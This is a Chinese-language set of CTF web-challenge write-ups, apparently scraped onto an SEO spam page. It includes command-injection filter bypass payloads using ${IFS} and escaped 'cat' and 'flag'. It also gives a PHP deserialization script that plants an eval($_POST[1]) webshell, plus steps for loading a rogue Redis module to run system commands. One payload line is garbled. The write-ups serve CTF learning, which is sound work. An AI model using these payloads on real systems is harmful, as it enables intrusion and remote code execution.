当前位置: 首页 > news >正文

wordpress 代码高亮中文seo百度快照优化公司

wordpress 代码高亮中文,seo百度快照优化公司,顺德网站建设公司,wordpress返回500js类型 [SWPUCTF 2022 新生赛]js_sign 这是一道js信息泄露的题目直接查看源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码 解码在线网站:Tap Code - 许愿星 (wishingstarmoye.…

js类型

[SWPUCTF 2022 新生赛]js_sign

这是一道js信息泄露的题目直接查看源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码

解码在线网站:Tap Code - 许愿星 (wishingstarmoye.com)

注意要将数字之间的空格去掉

[MoeCTF 2021]2048

查看源代码

找到

    req.open("GET","flag.php?score="+obj.score,true);

这行代码然后直接

得到flag

md5类型

[SWPUCTF 2022 新生赛]奇妙的MD5

第一关特殊的字符串ffifdyop

第二第三关数组绕过

ssti模板注入

[安洵杯 2020]Normal SSTI

第一种方法

fenjing一把嗦

执行fenjing命令

python -m fenjing webui

然后填写网址一把嗦

命令执行

[MoeCTF 2021]babyRCE

查看源代码

 <?php$rce = $_GET['rce'];
if (isset($rce)) {if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {system($rce);}else {echo "hhhhhhacker!!!"."\n";}
} else {highlight_file(__FILE__);
} 

一个命令执行主要排除了一些打开文件的命令还有空格,这里使用下面的命令进行绕过

?rce=uniq${IFS}fla?.php
?rce=c\at${IFS}fl\ag.php
?rce=ls|grepIFSf∣xargsIFSf∣xargs{IFS}-iIFScpIFScp{IFS}{}${IFS}t.txt

应该还有很多命令就不在列举,至于flag的名字可以直接ls进行查看,并没有禁止ls

[FSCTF 2023]webshell是啥捏 

源码

 <?php
highlight_file(__FILE__);
$😀="a";
$😁="b";
$😂="c";
$🤣="d";
$😃="e";
$😄="f";
$😅="g";
$😆="h";
$😉="i";
$😊="j";
$😋="k";
$😎="l";
$😍="m";
$😘="n";
$😗="o";
$😙="p";
$😚="q";
$🙂="r";
$🤗="s";
$🤩="t";
$🤔="u";
$🤨="v";
$😐="w";
$😑="x";
$😶="y";
$🙄="z";$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;if (isset($_GET['👽'])) {eval($😭($_GET['👽']));
};?> 

正常的命令执行

php反序列化

[天翼杯 2021]esay_eval

打开网页查看源代码

<?php
class A{public $code = "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code = "";}
}class B{function __destruct(){echo $this->a->a();}
}
if(isset($_REQUEST['poc'])){preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);if (isset($ret[1])) {foreach ($ret[1] as $i) {if(intval($i)!==1){exit("you want to bypass wakeup ? no !");}}unserialize($_REQUEST['poc']);    }}else{highlight_file(__FILE__);
} 

魔法函数都非常简单,在这里反序列化触发逻辑也非常简单 B类当中的__destruct()去触发A类当中的__call最后在绕过__wakeup()这个魔法函数就行了

其中这里过滤了B,A字母,这个正则表达式主要是限制上面的类名的,而在php代码当中类名是不限制大小写的,所以直接大小写绕过即可;

脚本如下

<?php
class a{function __construct(){$this->code="eval($_POST[1]);";}}
class b{public $a;
}
$c=new b();
$c->a=new a();echo serialize($c);//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[1]);";}}

在将木马传入之后用蚁剑连接,在蚁剑当中可以打开swp那个文件在文件最后有一些信息

提示打redis,那么就用蚁剑插件登录redis,密码也给你了为you_cannot_guess_it,登录一下

然后在刚才的目录下上传一个exp.so文件,文件地址

https://github.com/Dliv3/redis-rogue-server

上传之后,在打开redis页面

点击那个执行指令

MODULE LOAD "/var/www/html/exp.so"

执行上面指令然后就可以命令执行了

system.exec "ls /"

命令执行格式如上

http://www.hrbkazy.com/news/9480.html

相关文章:

  • wordpress网站管理系统百度快速收录3元一条
  • 交友网站建设策划方案(2)seowhy培训
  • 织梦做淘宝客网站视频教程g3云推广
  • 低价做网站靠谱吗分享推广
  • 如何建设公司网站信息北京推广优化公司
  • 力博彩票网站开发新能源汽车公司
  • 三丰云免费虚拟主机博客网站seo
  • 上传的网站打不开怎么办交换友情链接的条件
  • 国外包装设计欣赏网站网站建设免费
  • 天津网站建设揭秘百度网站提交收录入口
  • 物流网站建设费用互联网广告推广好做吗
  • 在香港做网站需要什么软件下载百度网盘app最新版
  • 如何做基金公司网站广告代理
  • 做网站时怎样图片上传怎么才能让图片不变形_有什么插件吗百度平台商户电话号码
  • 做网站的p什么2003谷歌优化seo
  • 门户网站建设工作情况汇报湖北网站seo策划
  • 怎么做自己的网站卖东西seocms
  • 做网站建设公司crm在线的提升服务青岛seo网站推广
  • 2013网站怎么备案百度热搜榜小说排名
  • 汕头制作网站推荐网站设计软件
  • 王爷不敢当优化网站推广
  • 做网站系统如何保证自己的版权网站seo李守洪排名大师
  • 乌鲁木齐高新区建设局网站广东疫情防控措施
  • 外贸网站建设 武汉黄冈黄页88网黄冈房产估价
  • 四川省城乡建设厅门户网站营销推广工作内容
  • 建设银行ma love网站珠海seo快速排名
  • 做代购可以在哪些网站上seo是如何优化
  • 深圳宝安机场疫情最新规定长春seo培训
  • 天元建设集团有限公司单位代码seo课程培训中心
  • 襄阳网站seo厂家win10优化工具